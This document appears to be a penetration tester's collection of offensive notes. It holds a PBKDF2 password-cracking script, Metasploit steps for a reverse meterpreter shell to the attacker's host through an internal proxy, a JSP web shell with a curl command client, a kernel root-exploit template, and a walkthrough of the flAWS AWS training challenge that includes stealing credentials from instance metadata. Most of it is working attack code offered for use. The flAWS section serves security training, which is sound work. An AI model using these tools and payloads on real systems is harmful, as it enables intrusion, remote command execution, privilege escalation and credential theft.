# Cracking PBKDF2WithHmacSHA1/160/128000

# cat crack.py
import base64
import hashlib
import sys

dict = sys.argv[1]
b64e = sys.argv[2]
b64d = base64.b64decode(b64e)
secret = b64d[16:]

f = open(dict)
words = f.read().splitlines()
f.close()

hash_name = 'sha1'
salt = b64d[8:16]
iterations = 128000
dklen = 160 / 8

for word in words:
 dk = hashlib.pbkdf2_hmac(hash_name, word, salt, iterations, dklen)
 if dk == secret:
  print b64e, word
  break

# cat dict.txt
test

# python crack.py dict.txt AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp
AAAAoAAB9ADMtinzIX3MlHctwKlZd9XHnTgrworaGp3bNFBp test

References

https://en.wikipedia.org/wiki/PBKDF2
https://docs.python.org/3/library/hashlib.html#key-derivation

# Reverse meterpreter through an internal HTTP proxy server

Attacker's host

msf > use payload/python/meterpreter/reverse_http
msf payload(reverse_http) > set lhost LOCAL_PUBLIC_IP
msf payload(reverse_http) > set lport 80
msf payload(reverse_http) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf payload(reverse_http) > set payloadproxyport INTERNAL_PROXY_PORT
msf payload(reverse_http) > generate -b '\x00\xff' -t raw -f met.py

msf > use exploit/multi/handler
msf exploit(handler) > set payload python/meterpreter/reverse_http
msf exploit(handler) > set lhost LOCAL_PUBLIC_IP
msf exploit(handler) > set lport 80
msf exploit(handler) > set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf exploit(handler) > set PayloadProxyPort INTERNAL_PROXY_PORT
msf exploit(handler) > run

Compromised server

# python met.py

# JSP webshell

# cat shell.jsp
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

<%
String getcmd = request.getParameter("cmd");
if (getcmd != null) {
 //out.println("Command: " + getcmd + "<br>");
 String[] cmd = {"/bin/sh", "-c", getcmd};
 Process p = Runtime.getRuntime().exec(cmd);
 OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream();
 DataInputStream dis = new DataInputStream(in);
 String disr = dis.readLine();
 //out.println("<pre>"); 
 while ( disr != null ) {
  out.println(disr); 
  disr = dis.readLine(); 
 }
 //out.println("</pre>"); 
}
%>

# cat shell.sh
#!/bin/bash

HISTFILE=./file_history
history -r

input=""

while [ "$input" != "exit" ]; do
 read -e -p "> " input
 history -s $input
 curl -k --cookie 'VAR1=VALUE1' --cookie 'VAR2=VALUE2' --data-urlencode "cmd=$input" https://DOMAIN/DIR/shell.jsp
done

history -a

# Kernel exploit template

# cat kernel_exploit.tpt
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <fcntl.h>

typedef int __attribute__((regparm(3))) (*commit_creds_t)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred_t)(unsigned long cred);

prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;

void *get_ksym(char *name) {
 FILE *f = fopen("/proc/kallsyms", "rb");
 char c, sym[512];
 void *addr;
 int ret;

 while (fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0)
  if (!strcmp(sym, name))
   return addr;

 return NULL;
}

void get_root() {
 commit_creds(prepare_kernel_cred(0));
}

int main(int argc, char *argv[]) {

 prepare_kernel_cred = get_ksym("prepare_kernel_cred");
  commit_creds     = get_ksym("commit_creds");

 printf("[+] addr prepare_kernel_cred: %p\n", prepare_kernel_cred);
 printf("[+] addr commit_creds: %p\n", commit_creds);
 printf("[+] addr get_root: %p\n", get_root);

 // == Exploit code ==
 // Buffer overflow
 //   EIP = get_root
 // Null pointer dereference
 //   mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
 //   memcpy(mem, get_root, 0x1000);

 if (!getuid()) {
  char *shell = "/bin/sh";
  char *args[] = {shell, "-i", NULL};
  execve(shell, args, NULL);
 }

 return 0;
}

# flAWS challenge

Level 1: Directory (bucket) listing - Everyone

# # --no-sign-request: Do not sign requests. Credentials will not be loaded if this argument is provided.
# # --region (string): The region to use. Overrides config/env settings.
# aws --no-sign-request --region us-west-2 s3 ls s3://flaws.cloud/
# aws --no-sign-request --region us-west-2 s3 cp s3://flaws.cloud/secret-dd02c7c.html .
# cat secret-dd02c7c.html

Level 2: Directory (bucket) listing - Any authenticated AWS user

# aws --profile level2 configure
# aws s3 --profile level2 --region us-west-2 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# aws s3 --profile level2 --region us-west-2 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html .
# cat secret-e4443fc.html

Level 3: AWS keys leaked

# aws s3 --no-sign-request --region us-west-2 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# aws s3 --no-sign-request --region us-west-2 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git .git
# git log
# git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87
# cat secret
# aws --profile level3 configure
# aws --profile level3 s3 ls

Level 4: Public snapshot as a backup

# aws --profile level3 --region us-west-2 sts get-caller-identity
# aws --profile level3 --region us-west-2 ec2 describe-snapshots --owner-id 975426262029
# aws --profile level2 --region us-west-2 ec2 create-volume --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
# aws --profile level2 ec2 describe-volumes --region=us-west-2
# aws --profile level2 --region us-west-2 ec2 create-security-group --group-name devenv-sg --description 'My security group'
# aws --profile level2 --region us-west-2 ec2 authorize-security-group-ingress --group-name devenv-sg --protocol tcp --port 22 --cidr 0.0.0.0/0
# aws --profile level2 --region us-west-2 ec2 create-key-pair --key-name devenv-key --query 'KeyMaterial' --output text > devenv-key.pem
# aws --profile level2 --region us-west-2 ec2 run-instances --image-id ami-29ebb519 --security-group-ids sg-xxxxxxxx --count 1 --instance-type t1.micro --key-name devenv-key --query 'Instances[0].InstanceId'
# ssh -i devenv-key.pem ubuntu@ip
# mount /dev/xvdb1 /mnt
# cat /mnt/home/ubuntu/setupNginx.sh

Level 5: Metadata at 169.254.169.254

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# echo "aws_session_token = xx" >> .aws/credentials
# aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Level 6: SecurityAudit policy attached

# aws --profile level6 configure
# aws --profile level6 --region us-west-2 iam get-user
# aws --profile level6 --region us-west-2 iam list-attached-user-policies --user-name Level6
# aws --profile level6 --region us-west-2 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws --profile level6 --region us-west-2 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
# aws --profile level6 --region us-west-2 lambda list-functions
# aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
# aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id 's33ppypa75'
# restapiid='s33ppypa75'
# region='us-west-2'
# stagename='Prod'
# functionname='level6'
# curl -k https://$restapiid.execute-api.$region.amazonaws.com/$stagename/$functionname

Reference

https://summitroute.com/blog/2017/02/26/flaws_challenge/